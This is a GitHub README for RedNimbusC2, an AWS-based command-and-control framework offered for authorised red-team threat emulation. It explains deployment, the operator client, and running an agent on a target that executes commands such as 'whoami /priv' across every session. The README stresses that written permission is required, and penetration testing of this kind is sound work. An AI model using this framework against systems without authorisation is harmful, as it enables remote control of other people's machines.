bluesentinelsec/RedNimbusC2

☁️ RedNimbusC2

Red Nimbus C2 is a command and control framework built on AWS services including Lambda, S3, and CloudWatch.

The purpose of this tool is to enable legitimate cybersecurity practitioners to emulate advanced cyber threats. In that way, organizations can identify weaknesses and apply corrective and/or compensating controls to improve their security posture.

Check out the Pen Test HackFest presentation to learn more.

Demo

⚠️ READ THIS FIRST! ⚠️

  • You are solely responsible for your use of this tool.

  • You are required to build it, deploy it, and operate it.

  • 💰 🔥 You will be charged for your use of AWS resources.

  • Before utilizing this tool, ensure you have explicit written permission to assess the target network(s) from the network owner(s).

  • Additionally, you are responsible for complying with the AWS support policy for penetration testing, available here.

  • Misuse of this tool is strongly condemned by the author, and will almost certainly result in criminal and/or legal action.

🚧 Pardon Our Dust

This repository is under active development.

Content is not stable at this time.

💾 Prerequisites

1. Create AWS Account

Red Nimbus C2 makes exclusive use of AWS cloud services.

For this reason, you must have your own AWS account.

Instructions on creating an AWS account are provided here.

2. Install Build Dependencies

You must install the following resources in order to build and operate Red Nimbus C2:

  1. Node.js
  2. Python 3
  3. AWS SDK for Python (Boto3)
  4. Go
  5. AWS CLI
  6. AWS CDK
  7. Make
  8. Git

You can optionally use the provided Dockerfile to build a pre-configured Docker container:

# build the RedNimbusC2 docker image
docker build -t red-nimbus-c2 .

# execute the red-nimbus-c2 container
docker run -it red-nimbus-c2 bash

Next, configure AWS CLI with your AWS access key ID and secret access key.

See here for guidance on setting up AWS CLI.

aws configure

💻 Installation

After installing the needed build dependencies, you can install and deploy Red Nimbus C2 using the following commands.

  1. Clone the repository

git clone https://github.com/bluesentinelsec/RedNimbusC2.git

  2. Deploy Red Nimbus C2 infrastructure to AWS using CDK

# enter the RedNimbusC2 directory
cd RedNimbusC2

# deploy RedNimbusC2 resources to AWS
make deploy

Your C2 URL will be found in this file after deployment:

RedNimbusC2/nimbus_c2_url.json

Optionally deploy to a specific AWS account like so; see here for info on configuring AWS CLI profiles.

make deploy AWS_PROFILE=<your_profile>

  3. Install the Red Nimbus C2 Operator Client

# from RedNimbusC2 directory
pip3 install -r operator_client/requirements.txt

python3 operator_client/nimbusc2.py --help

Operator Instructions

Red Nimbus C2 uses the following workflow:

  1. Deploy agent to target
  2. Issue commands using the Nimbus C2 operator client
  3. Cleanup when finished

1. Deploy Agent to Target System(s)

We provide an example agent written in Python.

You may use this script as a reference to implement your own agent for operational purposes. Go is a good choice.

Otherwise, you are responsible for deploying the agent to your intended target.

As a reminder, always stay in scope, always follow your rules of engagement, and always get explicit written permission to execute prior to conducting your engagement.

Once the agent is on target, you can execute it as follows:

# view help
python3 agent.py --help

# start C2 loop
# get your API Gateway URL from this file:
# RedNimbusC2/nimbus_c2_url.json
python3 agent.py --url <AWS API Gateway URL>

2. Issue commands using the Nimbus C2 operator client

The Red Nimbus C2 operator client is provided here.

Interact with Agent Sessions

# view info about all sessions
nimbusc2.py --list-sessions

Issue Commands to Agents

# issue an agent task; will be executed by all agents by default
nimbusc2.py --set-task --cmd "exec-cmd" --args "whoami /priv"

View Task Output

At this time you can view agent output in AWS CloudWatch.

A future enhancement will be added to integrate agent task output with the operator client terminal.

Cleanup

❗ To remove the Red Nimbus C2 infrastructure on AWS:

# remove nimbusc2 binaries and AWS infrastructure
# this will destroy any operational data you may have
# in S3, so be sure to back up your data before uninstalling if necessary
make destroy